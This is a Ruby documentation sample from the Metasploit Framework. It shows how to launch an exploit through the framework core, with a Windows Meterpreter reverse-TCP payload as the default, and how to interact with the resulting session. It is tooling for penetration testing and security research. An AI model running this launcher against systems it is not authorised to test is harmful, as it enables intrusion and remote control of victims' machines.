metasploit-framework/documentation/samples/framework/run_exploit_using_base.rb

49 lines
1.3 KiB
Ruby
Raw Normal View History

#!/usr/bin/env ruby
#
# This sample demonstrates using the framework core directly to launch an
# exploit. It makes use of the simplified exploit wrapper method provided by
# the Msf::Simple::Exploit mixin.
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
require 'msf/base'
if (ARGV.length == 0)
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
exit
end
framework = Msf::Simple::Framework.create
exploit_name = ARGV.shift || 'test/multi/aggressive'
payload_name = ARGV.shift || 'windows/meterpreter/reverse_tcp'
input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::Stdio.new
begin
# Initialize the exploit instance
exploit = framework.exploits.create(exploit_name)
# Fire it off.
session = exploit.exploit_simple(
'Payload' => payload_name,
'OptionStr' => ARGV.join(' '),
'LocalInput' => input,
'LocalOutput' => output)
# If a session came back, try to interact with it.
if (session)
output.print_status("Session #{session.sid} created, interacting...")
output.print_line
session.init_ui(input, output)
session.interact
else
output.print_line("Exploit completed, no session was created.")
end
rescue
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
end